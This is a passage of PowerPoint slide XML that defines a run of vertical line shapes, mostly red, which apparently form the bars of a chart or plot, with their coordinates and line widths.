        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6132798" y="5903644"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="42035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7126846" y="5903644"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="42035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2175252" y="5464138"/>
            <a:ext cx="0" cy="523473"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="264160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="263822"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2175252" y="5461165"/>
            <a:ext cx="0" cy="529765"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="267335">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="266824"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195086" y="5530775"/>
            <a:ext cx="0" cy="456779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="230505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="230195"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195086" y="5527802"/>
            <a:ext cx="0" cy="463070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="233680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="233197"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214919" y="5497458"/>
            <a:ext cx="0" cy="489498"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="247014">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="247008"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214919" y="5494483"/>
            <a:ext cx="0" cy="495789"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="250189">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="250011"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2234753" y="4742205"/>
            <a:ext cx="0" cy="1245765"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="628650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="628131"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2234753" y="4739230"/>
            <a:ext cx="0" cy="1250799"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="631189">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="631133"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2254586" y="5225343"/>
            <a:ext cx="0" cy="762559"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="384810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="384325"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2254586" y="5222367"/>
            <a:ext cx="0" cy="767593"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="387350">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="387328"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274420" y="4458984"/>
            <a:ext cx="0" cy="1528894"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="771525">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="771053"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274420" y="4456008"/>
            <a:ext cx="0" cy="1533927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="774064">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="774056"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2294252" y="4819947"/>
            <a:ext cx="0" cy="1167748"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="589280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="588900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2294252" y="4816974"/>
            <a:ext cx="0" cy="1174039"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="592455">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="591903"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2314087" y="3809244"/>
            <a:ext cx="0" cy="2178201"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1099185">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1098932"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2314087" y="3806267"/>
            <a:ext cx="0" cy="2184493"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1102360">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1101934"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333919" y="4303489"/>
            <a:ext cx="0" cy="1683670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="849630">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="849520"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333919" y="4300516"/>
            <a:ext cx="0" cy="1689962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="852805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="852523"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2353753" y="2820749"/>
            <a:ext cx="0" cy="3167263"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1598295">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1597755"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2353753" y="2817774"/>
            <a:ext cx="0" cy="3172297"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1600835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1600757"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373586" y="4053589"/>
            <a:ext cx="0" cy="1934080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="975994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="975627"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2373586" y="4050615"/>
            <a:ext cx="0" cy="1940372"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="979169">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="978630"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2393818" y="1648996"/>
            <a:ext cx="0" cy="4338786"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2189480">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2189056"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2393818" y="1646022"/>
            <a:ext cx="0" cy="4345078"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2192655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2192059"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413651" y="2987349"/>
            <a:ext cx="0" cy="2999903"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1513839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1513683"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413651" y="2984376"/>
            <a:ext cx="0" cy="3006195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
